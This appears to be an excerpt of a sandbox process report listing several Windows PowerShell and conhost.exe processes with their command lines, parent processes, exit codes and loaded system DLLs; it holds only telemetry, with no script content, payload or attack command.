c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
1948
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
5836
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
2692
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
1080
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
3404
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\win32u.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
3864
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5396
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
4128
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5680
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
